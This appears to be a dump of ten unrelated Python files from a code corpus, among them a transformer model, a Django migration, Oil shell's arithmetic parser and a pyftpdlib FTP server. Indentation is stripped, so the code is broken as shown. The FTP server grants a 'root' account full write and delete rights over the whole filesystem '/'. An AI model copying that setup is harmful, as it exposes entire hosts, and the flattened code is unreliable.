# Iterate the HALS algorithm until convergence or maxiter is reached
# i) compute the N gram matrices and multiply
# ii) Compute Khatri-Rao product
# iii) Update component U_1, U_2, ... U_N
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
while result.still_optimizing:
# First, HALS update.
for n in range(X.ndim):
# Select all components, but U_n
components = [U[j] for j in range(X.ndim) if j != n]
# i) compute the N-1 gram matrices
grams = sci.multiply.reduce([arr.T.dot(arr) for arr in components])
# ii) Compute Khatri-Rao product
kr = khatri_rao(components)
p = unfold(X, n).dot(kr)
# iii) Update component U_n
_hals_update(U[n], grams, p)
# Then, update masked elements.
pred = U.full()
X[~mask] = pred[~mask]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Update the optimization result, checks for convergence.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Compute objective function
# grams *= U[X.ndim - 1].T.dot(U[X.ndim - 1])
# obj = np.sqrt( (sci.sum(grams) - 2 * sci.sum(U[X.ndim - 1] * p) + normX**2)) / normX
resid = X - pred
result.update(linalg.norm(resid.ravel()) / normX)
# end optimization loop, return result.
return result.finalize() | StarcoderdataPython |
7598 | from xmlrpc.server import MultiPathXMLRPCServer
import torch.nn as nn
import torch.nn.functional as F
import copy
from src.layers.layers import Encoder, EncoderLayer, Decoder, DecoderLayer, PositionwiseFeedForward
from src.layers.preprocessing import Embeddings, PositionalEncoding
from src.layers.attention import MultiHeadedAttention
### Generic EncoderDecoder structure:
class EncoderDecoder(nn.Module):
"""
A standard Encoder-Decoder architecture. Base for this and many
other models.
"""
def __init__(self, encoder, decoder, src_embed, tgt_embed, generator):
super(EncoderDecoder, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.src_embed = src_embed
self.tgt_embed = tgt_embed
self.generator = generator
def forward(self, src, tgt, src_mask, tgt_mask):
"Take in and process masked src and target sequences."
encoded_src = self.encode(src, src_mask)
return self.decode(encoded_src, src_mask, tgt, tgt_mask)
def encode(self, src, src_mask):
embedded_src = self.src_embed(src)
return self.encoder(embedded_src, src_mask)
def decode(self, memory, src_mask, tgt, tgt_mask):
embedded_tgt = self.tgt_embed(tgt)
return self.decoder(embedded_tgt, memory, src_mask, tgt_mask)
class Generator(nn.Module):
"Define standard linear + softmax generation step."
def __init__(self, d_model, vocab):
super(Generator, self).__init__()
self.proj = nn.Linear(d_model, vocab)
def forward(self, x):
return F.log_softmax(self.proj(x), dim=-1)
def make_model(src_vocab, tgt_vocab, N=6, d_model=512, d_ff=2048, h=8, dropout=0.1, alpha=0.5):
"Helper: Construct a model from hyperparameters."
c = copy.deepcopy
attn = MultiHeadedAttention(h, d_model, alpha=alpha)
ff = PositionwiseFeedForward(d_model, d_ff, dropout)
position = PositionalEncoding(d_model, dropout)
model = EncoderDecoder(
Encoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N),
Decoder(DecoderLayer(d_model, c(attn), c(attn), c(ff), dropout), N),
nn.Sequential(Embeddings(d_model, src_vocab), c(position)),
nn.Sequential(Embeddings(d_model, tgt_vocab), c(position)),
Generator(d_model, tgt_vocab)
)
# This was important from their code.
# Initialize parameters with Glorot / fan_avg.
for p in model.parameters():
if p.dim() > 1:
nn.init.xavier_uniform(p)
return model
if __name__ == '__main__':
# Small example model
tmp_model = make_model(10, 10, 2)
print(tmp_model)
| StarcoderdataPython |
134214 | <reponame>Jumpscale/jumpscale6_core<filename>apps/jsftpserver/jsftpserver.py
#!/usr/bin/env python
# $Id: basic_ftpd.py 1174 2013-02-19 11:25:49Z g.rodola $
# pyftpdlib is released under the MIT license, reproduced below:
# ======================================================================
# Copyright (C) 2007-2013 <NAME>' <<EMAIL>>
#
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# ======================================================================
"""A basic FTP server which uses a DummyAuthorizer for managing 'virtual
users', setting a limit for incoming connections.
"""
import os
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from JumpScale import j
j.application.appname = "jsftpserver"
j.application.start()
def main():
# Instantiate a dummy authorizer for managing 'virtual' users
authorizer = DummyAuthorizer()
# Define a new user having full r/w permissions and a read-only
# anonymous user
root="/"
passwd=j.application.config.get("system.superadmin.passwd")
authorizer.add_user('root', passwd, root, perm='elradfmwM')
# authorizer.add_anonymous(os.getcwd())
# Instantiate FTP handler class
handler = FTPHandler
handler.authorizer = authorizer
# Define a customized banner (string returned when client connects)
handler.banner = "jsftp."
# Specify a masquerade address and the range of ports to use for
# passive connections. Decomment in case you're behind a NAT.
#handler.masquerade_address = '192.168.3.11'
handler.passive_ports = range(2112, 2222)
address = ('', 2111)
server = FTPServer(address, handler)
# set a limit for connections
server.max_cons = 256
server.max_cons_per_ip = 5
# start ftp server
server.serve_forever()
j.application.stop()
if __name__ == '__main__':
main()
| StarcoderdataPython |
45314 | from Task import Task
from Helper import Cli
class CliExecute(Task):
def __init__(self, logMethod, parent, params):
super().__init__("CLI Execute", parent, params, logMethod, None)
def Run(self):
parameters = self.params['Parameters']
cwd = self.params['CWD']
cli = Cli(parameters, cwd, self.logMethod)
cli.Execute()
| StarcoderdataPython |
109875 | <reponame>andrewhead/Search-Task-Logger
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-31 20:59
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('form', '0002_auto_20160530_2159'),
]
operations = [
migrations.CreateModel(
name='Strategy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_index', models.IntegerField()),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('concern', models.CharField(max_length=1000)),
('strategy', models.CharField(help_text='Please answer in 1 or 2 sentences. Feel free to take a minute to think about a strategy.', max_length=10000, verbose_name='Strategy: How will you determine which package is better for this concern?')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='question',
name='evidence',
field=models.CharField(blank=True, help_text='Please refer to specific information you found and pages where you found it.', max_length=10000, null=True, verbose_name='What evidence did you find to support your rating?'),
),
migrations.AddField(
model_name='question',
name='likert_comparison_evidence',
field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], default=-1, verbose_name="Based on the evidence you've seen, which package is better for this concern?"),
),
migrations.AddField(
model_name='question',
name='likert_comparison_intuition',
field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], default=-1, verbose_name='Ignoring evidence, which package do you think is actually better for this concern?'),
),
migrations.AddField(
model_name='question',
name='likert_coverage',
field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], default=-1, verbose_name='I was able to view all the online information relevant to this question'),
),
migrations.AlterField(
model_name='packagepair',
name='package1',
field=models.CharField(max_length=1000, verbose_name='What is the first package you will be learning about?'),
),
migrations.AlterField(
model_name='packagepair',
name='package2',
field=models.CharField(max_length=1000, verbose_name='What is the second one?'),
),
migrations.AlterField(
model_name='question',
name='likert_confidence',
field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], default=-1, verbose_name='How confident are you?'),
),
migrations.AlterField(
model_name='question',
name='strategy',
field=models.CharField(blank=True, help_text='What documents did you look at and why?', max_length=4000, null=True, verbose_name='What was your strategy for answering this question?'),
),
migrations.AlterField(
model_name='question',
name='url1',
field=models.CharField(blank=True, max_length=1000, null=True, verbose_name='URL of indicator 1'),
),
migrations.AlterField(
model_name='question',
name='url1_what',
field=models.CharField(blank=True, max_length=10000, null=True, verbose_name='What information on that site helped you?'),
),
migrations.AlterField(
model_name='question',
name='url1_where',
field=models.CharField(blank=True, max_length=1000, null=True, verbose_name='What web site does this URL point to?'),
),
migrations.AlterField(
model_name='question',
name='url1_why',
field=models.CharField(blank=True, max_length=10000, null=True, verbose_name='Why was this helpful?'),
),
]
| StarcoderdataPython |
4825302 | """
@brief test log(time=3s)
"""
import unittest
import datetime
import warnings
from pyquickhelper.loghelper import fLOG
from pyquickhelper.pycode import get_temp_folder
from pyensae.finance.astock import StockPrices, StockPricesHTTPException
class TestStockUrlGoogle(unittest.TestCase):
def test_download_stock_google(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
cache = get_temp_folder(__file__, "temp_url_google")
try:
stock = StockPrices("NASDAQ:MSFT", folder=cache,
begin=datetime.datetime(2014, 1, 15))
except StockPricesHTTPException as e:
warnings.warn(str(e))
return
df = stock.dataframe
dmin = df.Date.min()
self.assertIn("2014", str(dmin))
self.assertTrue(stock.url_.startswith(
"https://finance.google.com/finance/historical?q=NASDAQ:MSFT&startdate=Jan+15%2C+2014"))
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
176873 | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
The Generator of APDrawingGAN
"""
from mindspore import nn, ops
import mindspore
from src.networks import controller as networks
class PadOnes(nn.Cell):
"""PadOnes"""
def __init__(self, margin):
super(PadOnes, self).__init__()
self.margin = margin
self.ones = ops.Ones()
self.concat_h = ops.Concat(2)
self.concat_w = ops.Concat(3)
def construct(self, item):
bs, nc, h, w = item.shape
m_top = self.ones((bs, nc, self.margin[0][0], w), mindspore.float32)
m_down = self.ones((bs, nc, self.margin[0][1], w), mindspore.float32)
h = h + self.margin[0][0] + self.margin[0][1]
m_left = self.ones((bs, nc, h, self.margin[1][0]), mindspore.float32)
m_right = self.ones((bs, nc, h, self.margin[1][1]), mindspore.float32)
item = self.concat_h((m_top, item, m_down))
item = self.concat_w((m_left, item, m_right))
return item
class Generator(nn.Cell):
"""
Define generator model of APDrawingGAN
"""
def __init__(self, opt):
super(Generator, self).__init__()
# init parameters
self.support_non_tensor_inputs = True
self.fineSize = opt.fineSize
self.which_direction = opt.which_direction
self.use_local = opt.use_local
self.isTrain = opt.isTrain
self.isExport = opt.isExport
self.comb_op = opt.comb_op
self.EYE_H = opt.EYE_H
self.EYE_W = opt.EYE_W
self.NOSE_H = opt.NOSE_H
self.NOSE_W = opt.NOSE_W
self.MOUTH_H = opt.MOUTH_H
self.MOUTH_W = opt.MOUTH_W
self.support_non_tensor_inputs = True
# define Generator
self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain,
opt.nnG)
self.G_network_names = ['G']
if self.use_local:
print('G net use local')
self.netGLEyel = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, 3)
self.netGLEyer = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, 3)
self.netGLNose = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, 3)
self.netGLMouth = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, 3)
self.netGLHair = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet2', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, 4)
self.netGLBG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet2', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, 4)
self.netGCombine = networks.define_G(2 * opt.output_nc, opt.output_nc, opt.ngf, 'combiner', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, 2)
self.G_network_names = ['G', 'GLEyel', 'GLEyer', 'GLNose', 'GLMouth', 'GLHair', 'GLBG', 'GCombine']
def _addone_with_mask(self, A, mask):
ones = ops.Ones()
return ((A / 2 + 0.5) * mask + (ones(mask.shape, mindspore.float32) - mask)) * 2 - 1
def _masked(self, A, mask):
return (A / 2 + 0.5) * mask * 2 - 1
def _partCombiner2_bg(self, eyel, eyer, nose, mouth, hair, bg, maskh, maskb, comb_op=1):
"""
combine all parts
"""
if comb_op == 0:
# use max pooling, pad black for eyes etc
hair = self._masked(hair, maskh)
bg = self._masked(bg, maskb)
else:
# use min pooling, pad white for eyes etc
hair = self._addone_with_mask(hair, maskh)
bg = self._addone_with_mask(bg, maskb)
eyel_p = self.pad_el(eyel)
eyer_p = self.pad_er(eyer)
nose_p = self.pad_no(nose)
mouth_p = self.pad_mo(mouth)
if comb_op == 0:
maximum = ops.Maximum()
eyes = maximum(eyel_p, eyer_p)
eye_nose = maximum(eyes, nose_p)
eye_nose_mouth = maximum(eye_nose, mouth_p)
eye_nose_mouth_hair = maximum(hair, eye_nose_mouth)
result = maximum(bg, eye_nose_mouth_hair)
else:
minimum = ops.Minimum()
eyes = minimum(eyel_p, eyer_p)
eye_nose = minimum(eyes, nose_p)
eye_nose_mouth = minimum(eye_nose, mouth_p)
eye_nose_mouth_hair = minimum(hair, eye_nose_mouth)
result = minimum(bg, eye_nose_mouth_hair)
return result
def _inverse_mask(self, mask):
ones = ops.Ones()
return ones(mask.shape, mindspore.float32) - mask
def _generate_output(self, real_A, real_A_bg, real_A_eyel,
real_A_eyer, real_A_nose, real_A_mouth,
real_A_hair, mask, mask2):
"""
generate output
"""
# global
fake_B0 = self.netG(real_A)
# local
if self.use_local:
fake_B_eyel = self.netGLEyel(real_A_eyel)
fake_B_eyer = self.netGLEyer(real_A_eyer)
fake_B_nose = self.netGLNose(real_A_nose)
fake_B_mouth = self.netGLMouth(real_A_mouth)
fake_B_hair = self.netGLHair(real_A_hair)
fake_B_bg = self.netGLBG(real_A_bg)
fake_B1 = self._partCombiner2_bg(fake_B_eyel, fake_B_eyer, fake_B_nose, fake_B_mouth, fake_B_hair,
fake_B_bg, mask * mask2, self._inverse_mask(mask2),
self.comb_op)
op = ops.Concat(1)
output = op((fake_B0, fake_B1))
fake_B = self.netGCombine(output)
if self.isExport:
return fake_B
return fake_B, fake_B_eyel, fake_B_eyer, fake_B_nose, fake_B_mouth, \
self._masked(fake_B_hair, mask * mask2), self._masked(fake_B_bg, self._inverse_mask(mask2))
return fake_B0
def set_Grad(self, value):
self.netG.set_grad(value)
if self.use_local:
self.netGLEyer.set_grad(value)
self.netGLEyel.set_grad(value)
self.netGLMouth.set_grad(value)
self.netGLNose.set_grad(value)
self.netGLHair.set_grad(value)
self.netGLBG.set_grad(value)
return True
def set_pad(self, center):
"""
set padding function
"""
IMAGE_SIZE = self.fineSize
ratio = IMAGE_SIZE / 256
EYE_W = self.EYE_W * ratio
EYE_H = self.EYE_H * ratio
NOSE_W = self.NOSE_W * ratio
NOSE_H = self.NOSE_H * ratio
MOUTH_W = self.MOUTH_W * ratio
MOUTH_H = self.MOUTH_H * ratio
self.pad_el = PadOnes((
(int(center[0, 1] - EYE_H / 2), int(IMAGE_SIZE - (center[0, 1] + EYE_H / 2))),
(int(center[0, 0] - EYE_W / 2), int(IMAGE_SIZE - (center[0, 0] + EYE_W / 2)))
))
self.pad_er = PadOnes((
(int(center[1, 1] - EYE_H / 2), int(IMAGE_SIZE - (center[1, 1] + EYE_H / 2))),
(int(center[1, 0] - EYE_W / 2), int(IMAGE_SIZE - (center[1, 0] + EYE_W / 2)))
))
self.pad_no = PadOnes((
(int(center[2, 1] - NOSE_H / 2), int(IMAGE_SIZE - (center[2, 1] + NOSE_H / 2))),
(int(center[2, 0] - NOSE_W / 2), int(IMAGE_SIZE - (center[2, 0] + NOSE_W / 2)))
))
self.pad_mo = PadOnes((
(int(center[3, 1] - MOUTH_H / 2), int(IMAGE_SIZE - (center[3, 1] + MOUTH_H / 2))),
(int(center[3, 0] - MOUTH_W / 2), int(IMAGE_SIZE - (center[3, 0] + MOUTH_W / 2)))
))
def construct(self, real_A, real_A_bg, real_A_eyel, real_A_eyer,
real_A_nose, real_A_mouth, real_A_hair,
mask, mask2):
return self._generate_output(real_A, real_A_bg, real_A_eyel,
real_A_eyer, real_A_nose, real_A_mouth,
real_A_hair, mask, mask2)
| StarcoderdataPython |
4816421 | <filename>06_food_reviews/01_preprocessing.py<gh_stars>0
"""
@author: <EMAIL>
@site: e-smartdata.org
"""
import pandas as pd
df = pd.read_csv('Reviews.csv')
print(df.info())
df.to_csv('prep_reviews.tsv', sep='\t', header=False, index=False)
| StarcoderdataPython |
3349703 | """
tdop.py - Library for expression parsing.
"""
from _devbuild.gen.id_kind_asdl import Id, Id_t
from _devbuild.gen.syntax_asdl import (
arith_expr, arith_expr_e, arith_expr_t,
arith_expr__VarRef, arith_expr__Binary, arith_expr__ArithWord,
sh_lhs_expr, sh_lhs_expr_t,
word_t,
)
from _devbuild.gen.types_asdl import lex_mode_e
from core.util import p_die
from core import ui
from mycpp import mylib
from mycpp.mylib import tagswitch
from osh import word_
from typing import (
Callable, List, Dict, Tuple, Any, cast, TYPE_CHECKING
)
if TYPE_CHECKING: # break circular dep
from osh.word_parse import WordParser
from core import optview
LeftFunc = Callable[['TdopParser', word_t, arith_expr_t, int], arith_expr_t]
NullFunc = Callable[['TdopParser', word_t, int], arith_expr_t]
def IsIndexable(node):
# type: (arith_expr_t) -> bool
"""
a[1] is allowed but a[1][1] isn't
"""
return node.tag_() == arith_expr_e.VarRef
# TODO: x$foo[1] is also allowed
#return node.tag_() in (arith_expr_e.VarRef, arith_expr_e.ArithWord)
def ToLValue(node, parse_unimplemented):
# type: (arith_expr_t, bool) -> sh_lhs_expr_t
"""Determine if a node is a valid L-value by whitelisting tags.
Valid:
x = y
a[1] = y
Invalid:
a[0][0] = y
"""
UP_node = node
with tagswitch(node) as case:
if case(arith_expr_e.VarRef):
node = cast(arith_expr__VarRef, UP_node)
# For consistency with osh/cmd_parse.py, append a span_id.
# TODO: (( a[ x ] = 1 )) and a[x]=1 should use different LST nodes.
# sh_lhs_expr should be an "IR".
n = sh_lhs_expr.Name(node.token.val)
n.spids.append(node.token.span_id)
return n
elif case(arith_expr_e.ArithWord):
if parse_unimplemented:
node = cast(arith_expr__ArithWord, UP_node)
return sh_lhs_expr.Name('DUMMY_parse_unimplemented')
elif case(arith_expr_e.Binary):
node = cast(arith_expr__Binary, UP_node)
if node.op_id == Id.Arith_LBracket:
UP_left = node.left
if node.left.tag_() == arith_expr_e.VarRef:
left = cast(arith_expr__VarRef, UP_left)
return sh_lhs_expr.IndexedName(left.token.val, node.right)
if parse_unimplemented and node.left.tag_() == arith_expr_e.ArithWord:
return sh_lhs_expr.IndexedName(
'DUMMY_parse_unimplemented', node.right)
# But a[0][0] = 1 is NOT valid.
return None
#
# Null Denotation
#
def NullError(p, t, bp):
# type: (TdopParser, word_t, int) -> arith_expr_t
# TODO: I need position information
p_die("Token can't be used in prefix position", word=t)
return None # never reached
def NullConstant(p, w, bp):
# type: (TdopParser, word_t, int) -> arith_expr_t
var_name_token = word_.LooksLikeArithVar(w)
if var_name_token:
return arith_expr.VarRef(var_name_token)
return arith_expr.ArithWord(w)
def NullParen(p, t, bp):
# type: (TdopParser, word_t, int) -> arith_expr_t
""" Arithmetic grouping """
r = p.ParseUntil(bp)
p.Eat(Id.Arith_RParen)
return r
def NullPrefixOp(p, w, bp):
# type: (TdopParser, word_t, int) -> arith_expr_t
"""Prefix operator.
Low precedence: return, raise, etc.
return x+y is return (x+y), not (return x) + y
High precedence: logical negation, bitwise complement, etc.
!x && y is (!x) && y, not !(x && y)
"""
right = p.ParseUntil(bp)
return arith_expr.Unary(word_.ArithId(w), right)
#
# Left Denotation
#
def LeftError(p, t, left, rbp):
# type: (TdopParser, word_t, arith_expr_t, int) -> arith_expr_t
# Hm is this not called because of binding power?
p_die("Token can't be used in infix position", word=t)
return None # never reached
def LeftBinaryOp(p, w, left, rbp):
# type: (TdopParser, word_t, arith_expr_t, int) -> arith_expr_t
""" Normal binary operator like 1+2 or 2*3, etc. """
# TODO: w shoudl be a Token, and we should extract the token from it.
return arith_expr.Binary(word_.ArithId(w), left, p.ParseUntil(rbp))
def LeftAssign(p, w, left, rbp):
# type: (TdopParser, word_t, arith_expr_t, int) -> arith_expr_t
""" Normal binary operator like 1+2 or 2*3, etc. """
# x += 1, or a[i] += 1
lhs = ToLValue(left, p.parse_opts.parse_unimplemented())
if lhs is None:
# TODO: It would be nice to point at 'left', but osh/word.py doesn't
# support arbitrary arith_expr_t.
#p_die("Can't assign to this expression", word=w)
p_die("Left-hand side of this assignment is invalid", word=w)
return arith_expr.BinaryAssign(word_.ArithId(w), lhs, p.ParseUntil(rbp))
#
# Parser definition
#
if mylib.PYTHON:
def _ModuleAndFuncName(f):
# type: (Any) -> Tuple[str, str]
namespace = f.__module__.split('.')[-1]
return namespace, f.__name__
def _CppFuncName(f):
# type: (Any) -> str
return '%s::%s' % _ModuleAndFuncName(f)
class LeftInfo(object):
"""Row for operator.
In C++ this should be a big array.
"""
def __init__(self, led=None, lbp=0, rbp=0):
# type: (LeftFunc, int, int) -> None
self.led = led or LeftError
self.lbp = lbp
self.rbp = rbp
def __str__(self):
# type: () -> str
"""Used by C++ code generation."""
return '{ %s, %d, %d },' % (_CppFuncName(self.led), self.lbp, self.rbp)
def ModuleAndFuncName(self):
# type: () -> Tuple[str, str]
"""Used by C++ code generation."""
return _ModuleAndFuncName(self.led)
class NullInfo(object):
"""Row for operator.
In C++ this should be a big array.
"""
def __init__(self, nud=None, bp=0):
# type: (NullFunc, int) -> None
self.nud = nud or LeftError
self.bp = bp
def __str__(self):
# type: () -> str
"""Used by C++ code generation."""
return '{ %s, %d },' % (_CppFuncName(self.nud), self.bp)
def ModuleAndFuncName(self):
# type: () -> Tuple[str, str]
"""Used by C++ code generation."""
return _ModuleAndFuncName(self.nud)
class ParserSpec(object):
"""Specification for a TDOP parser.
This can be compiled to a table in C++.
"""
def __init__(self):
# type: () -> None
self.nud_lookup = {} # type: Dict[Id_t, NullInfo]
self.led_lookup = {} # type: Dict[Id_t, LeftInfo]
def Null(self, bp, nud, tokens):
# type: (int, NullFunc, List[Id_t]) -> None
"""Register a token that doesn't take anything on the left.
Examples: constant, prefix operator, error.
"""
for token in tokens:
self.nud_lookup[token] = NullInfo(nud=nud, bp=bp)
if token not in self.led_lookup:
self.led_lookup[token] = LeftInfo() # error
def _RegisterLed(self, lbp, rbp, led, tokens):
# type: (int, int, LeftFunc, List[Id_t]) -> None
for token in tokens:
if token not in self.nud_lookup:
self.nud_lookup[token] = NullInfo(NullError)
self.led_lookup[token] = LeftInfo(lbp=lbp, rbp=rbp, led=led)
def Left(self, bp, led, tokens):
# type: (int, LeftFunc, List[Id_t]) -> None
"""Register a token that takes an expression on the left."""
self._RegisterLed(bp, bp, led, tokens)
def LeftRightAssoc(self, bp, led, tokens):
# type: (int, LeftFunc, List[Id_t]) -> None
"""Register a right associative operator."""
self._RegisterLed(bp, bp - 1, led, tokens)
def LookupNud(self, token):
# type: (Id_t) -> NullInfo
try:
nud = self.nud_lookup[token]
except KeyError:
raise AssertionError('No nud for token %r' % token)
return nud
def LookupLed(self, token):
# type: (Id_t) -> LeftInfo
"""Get a left_info for the token."""
return self.led_lookup[token]
class TdopParser(object):
"""
Parser state. Current token and lookup stack.
"""
def __init__(self, spec, w_parser, parse_opts):
# type: (ParserSpec, WordParser, optview.Parse) -> None
self.spec = spec
self.w_parser = w_parser
self.parse_opts = parse_opts
self.cur_word = None # type: word_t # current token
self.op_id = Id.Undefined_Tok
def AtToken(self, token_type):
# type: (Id_t) -> bool
return self.op_id == token_type
def Eat(self, token_type):
# type: (Id_t) -> None
"""Assert that we're at the current token and advance."""
if not self.AtToken(token_type):
p_die('Parser expected %s, got %s',
ui.PrettyId(token_type), ui.PrettyId(self.op_id),
word=self.cur_word)
self.Next()
def Next(self):
# type: () -> bool
self.cur_word = self.w_parser.ReadWord(lex_mode_e.Arith)
self.op_id = word_.ArithId(self.cur_word)
return True
def ParseUntil(self, rbp):
# type: (int) -> arith_expr_t
"""
Parse to the right, eating tokens until we encounter a token with binding
power LESS THAN OR EQUAL TO rbp.
"""
# TODO: use Kind.Eof
if self.op_id in (Id.Eof_Real, Id.Eof_RParen, Id.Eof_Backtick):
p_die('Unexpected end of input', word=self.cur_word)
t = self.cur_word
null_info = self.spec.LookupNud(self.op_id)
self.Next() # skip over the token, e.g. ! ~ + -
node = null_info.nud(self, t, null_info.bp)
while True:
t = self.cur_word
try:
left_info = self.spec.LookupLed(self.op_id)
except KeyError:
raise AssertionError('Invalid token %s' % t)
# Examples:
# If we see 1*2+ , rbp = 27 and lbp = 25, so stop.
# If we see 1+2+ , rbp = 25 and lbp = 25, so stop.
# If we see 1**2**, rbp = 26 and lbp = 27, so keep going.
if rbp >= left_info.lbp:
break
self.Next() # skip over the token, e.g. / *
node = left_info.led(self, t, node, left_info.rbp)
return node
def Parse(self):
# type: () -> arith_expr_t
self.Next() # may raise ParseError
return self.ParseUntil(0)
| StarcoderdataPython |
4809730 | #!/usr/bin/env python
"""
Copyright (c) 2016 <EMAIL>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os
import json
import logging
import argparse
import getpass
import time
import webbrowser
import sys
import traceback
from client import Client
from pgoapi.exceptions import NotLoggedInException
from geopy.geocoders import GoogleV3
from ortools.constraint_solver import pywrapcp
# You need to import routing_enums_pb2 after pywrapcp!
from geopy.distance import great_circle
import numpy as np
from sklearn.cluster import DBSCAN
from sklearn import metrics
from sklearn.datasets.samples_generator import make_blobs
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
log = logging.getLogger(__name__)
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.DEBUG)
logFormatter = logging.Formatter('%(asctime)s [%(module)10s] [%(levelname)5s] %(message)s')
fileHandler = logging.FileHandler('log.log')
fileHandler.setFormatter(logFormatter)
fileHandler.setLevel(logging.DEBUG)
# rootLogger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
consoleHandler.setLevel(logging.INFO)
logging.getLogger(__name__).addHandler(consoleHandler)
logging.getLogger('client').addHandler(consoleHandler)
class Cluster():
def __init__(self, lst):
self.lst = lst
print 'Pokestop = ', len(self.lst)
def solve(self):
X = []
for p in self.lst:
X.append([p['latitude'], p['longitude']])
X = np.array(X)
db = DBSCAN(eps=0.001, min_samples=2).fit(X)
core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
core_samples_mask[db.core_sample_indices_] = True
labels = db.labels_
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
unique_labels = set(labels)
colors = plt.cm.Spectral(np.linspace(0, 1, len(unique_labels)))
_max = 0
_k = -1
for k, col in zip(unique_labels, colors):
if k == -1:
# Black used for noise.
col = 'k'
class_member_mask = (labels == k)
xy = X[class_member_mask & core_samples_mask]
plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=col,
markeredgecolor='k', markersize=14)
if len(xy) > _max:
_max = len(xy)
_k = class_member_mask & core_samples_mask
xy = X[class_member_mask & ~core_samples_mask]
plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=col,
markeredgecolor='k', markersize=6)
